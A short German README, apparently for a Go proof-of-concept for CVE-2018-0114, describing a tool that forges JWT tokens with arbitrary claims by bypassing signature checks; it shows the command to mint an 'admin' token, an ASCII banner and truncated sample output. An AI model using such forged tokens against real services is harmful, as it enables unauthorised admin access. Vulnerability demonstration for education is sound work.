
Proof-of-Concept-Exploit für CVE-2018-0114, der gefälschte JWT-Token mit beliebigen Ansprüchen generiert und eine Schwachstelle zur Umgehung der Signaturprüfung demonstriert.
Referenz: CVE-2018-0114
Hinweis: Nur für Bildungszwecke.
Um einen JWT mit dem Anspruch "admin" zu generieren, führen Sie den folgenden Befehl im Projektverzeichnis aus:
go run . --claim=admin
____ __ __ ____ ___ __ _ __ __ _ _ __ __
/\ _`\ /\ \/\ \ /\ _`\ /'___`\ /'__`\ /' \ /'_ `\ /'__`\ /' \ /' \ /\ \\ \
\ \ \/\_\ \ \ \ \ \ \ \ \L\_\ /\_\ /\ \ /\ \/\ \ /\_, \ /\ \L\ \ /\ \/\ \ /\_, \ /\_, \ \ \ \\ \
\ \ \/_/_ \ \ \ \ \ \ \ _\L _______ \/_/// /__ \ \ \ \ \ \/_/\ \ \/_> _ <_ _______ \ \ \ \ \ \/_/\ \ \/_/\ \ \ \ \\ \_
\ \ \L\ \ \ \ \_/ \ \ \ \L\ \/\______\ // /_\ \ \ \ \_\ \ \ \ \ /\ \L\ \/\______\ \ \ \_\ \ \ \ \ \ \ \ \ \__ ,__\
\ \____/ \ `\___/ \ \____/\/______/ /\______/ \ \____/ \ \_\ \ \____/\/______/ \ \____/ \ \_\ \ \_\ \/_/\_\_/
\/___/ `\/__/ \/___/ \/_____/ \/___/ \/_/ \/___/ \/___/ \/_/ \/_/ \/_/
[x] Generating JWT with payload "admin" ...
[x] Keys Generated
[x] Signature Signed
eyJhbGciOiJSUzI1NiIsI.......